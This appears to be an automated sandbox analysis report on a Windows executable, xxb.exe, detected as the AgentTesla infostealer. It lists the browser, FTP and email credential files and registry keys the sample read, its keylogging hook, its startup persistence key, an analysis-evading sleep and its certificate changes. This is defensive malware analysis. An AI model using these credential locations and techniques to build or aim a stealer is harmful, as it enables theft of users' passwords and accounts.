file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Looks up the external IP address (1 event)

domain

api.ipify.org

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 14, 2022, 9:36 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 14, 2022, 9:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Dec. 14, 2022, 9:36 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

xxb.exe tried to sleep 13640966 seconds, actually delayed analysis time by 13640966 seconds

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\adgXcLf

reg_value

C:\Users\test22\AppData\Roaming\adgXcLf\adgXcLf.exe

Harvests credentials from local FTP client softwares (5 events)

file	C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file	C:\Users\test22\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
registry	HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExW Dec. 14, 2022, 9:36 a.m.	thread_identifier: 0 callback_function: 0x00950f2a hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x001b0000	1	197071	0

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\Users\test22\AppData\Roaming\adgXcLf\adgXcLf.exe:Zone.Identifier

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

Bkav	W32.AIDetectNet.01
Lionic	Trojan.Win32.Agensla.4!c
MicroWorld-eScan	Trojan.GenericKD.64242420
FireEye	Generic.mg.04d076299d2b644c
McAfee	RDN/Generic PWS.y
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Alibaba	Trojan:Win32/Starter.ali2000005
Cybereason	malicious.9a2161
Arcabit	IL:Trojan.MSILZilla.D5C50
Cyren	W32/Azorult.D.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
Elastic	Windows.Trojan.AgentTesla
ESET-NOD32	a variant of MSIL/Spy.AgentTesla.E
Cynet	Malicious (score: 99)
APEX	Malicious
Kaspersky	HEUR:Trojan-PSW.MSIL.Agensla.gen
BitDefender	Trojan.GenericKD.64242420
Avast	Win32:SpywareX-gen [Trj]
Tencent	Msil.Trojan-QQPass.QQRob.Zimw
Ad-Aware	IL:Trojan.MSILZilla.23632
Sophos	Mal/Generic-S + Troj/Steal-CXQ
VIPRE	IL:Trojan.MSILZilla.23632
TrendMicro	TROJ_GEN.R002C0RLD22
McAfee-GW-Edition	BehavesLike.Win32.Generic.ch
Trapmine	malicious.moderate.ml.score
Emsisoft	IL:Trojan.MSILZilla.23632 (B)
Webroot	W32.Trojan.MSILZilla
Avira	HEUR/AGEN.1203035
MAX	malware (ai score=80)
Kingsoft	Win32.PSWTroj.Undef.(kcloud)
Microsoft	HackTool:Win64/Mimikatz.A
GData	IL:Trojan.MSILZilla.23632
Google	Detected
AhnLab-V3	Trojan/Win.AgentTesla.C5057006
Acronis	suspicious
VBA32	Malware-Cryptor.MSIL.AgentTesla.Heur
ALYac	IL:Trojan.MSILZilla.23632
TrendMicro-HouseCall	TROJ_GEN.R002C0RLD22
Rising	Spyware.AgentTesla!8.10E35 (CLOUD)
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/AgentTesla.D!tr
BitDefenderTheta	Gen:NN.ZemsilF.36106.km0@a0NeTMj
AVG	Win32:SpywareX-gen [Trj]
Panda	Trj/Chgt.AD
CrowdStrike	win/malicious_confidence_100% (W)

xxb.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All